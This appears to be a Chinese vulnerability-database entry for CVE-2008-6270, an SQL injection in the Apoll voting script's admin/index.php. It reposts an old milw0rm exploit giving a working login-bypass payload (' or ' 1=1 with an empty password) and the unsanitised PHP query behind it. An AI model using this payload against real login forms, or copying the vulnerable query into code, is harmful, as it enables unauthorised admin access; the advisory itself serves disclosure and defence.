Miticdjd Dragan Mitic Apoll 'admin/index.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116611 漏洞类型 SQL注入
发布时间 2008-11-03 更新时间 2009-02-25
CVE编号 CVE-2008-6270 CNNVD-ID CNNVD-200902-550
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6969
https://www.securityfocus.com/bid/80746
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-550
|漏洞详情
Apoll是一款在线投票脚本DraganMiticApoll0.7beta版本和0.7.5版本的admin/index.php中存在SQL注入漏洞。远程攻击者可以借助用户参数,执行任意SQL指令。
|漏洞EXP
[~] Apoll version Remote Auth Bypass Vulnerability
[~]
[~] version: beta 0.7
[~]
[~] script dwonload: http://www.miticdjd.com/download/3/
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

admin login:

http://localhost/apoll/admin/index.php


Exploit:

username: [real_admin_or_user_name] ' or ' 1=1

password: dont write anything

note: generally admin name: admin 


example for my localhost:

admin: zorlu

user: salla



username: zorlu ' or ' 1=1

password: empty

or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )

username: salla ' or ' 1=1

password: empty 


file: 

apoll/admin/index.php

code:

$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
	$num = @mysql_num_rows($mysql);




[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-03]
|受影响的产品
Miticdjd Apoll 0.7.5 Miticdjd Apoll 0.7 Beta
|参考资料

来源:XF
名称:apoll-user-sql-injection(48982)
链接:http://xforce.iss.net/xforce/xfdb/48982
来源:XF
名称:apoll-index-sql-injection(46286)
链接:http://xforce.iss.net/xforce/xfdb/46286
来源:BID
名称:32079
链接:http://www.securityfocus.com/bid/32079
来源:MILW0RM
名称:6969
链接:http://www.milw0rm.com/exploits/6969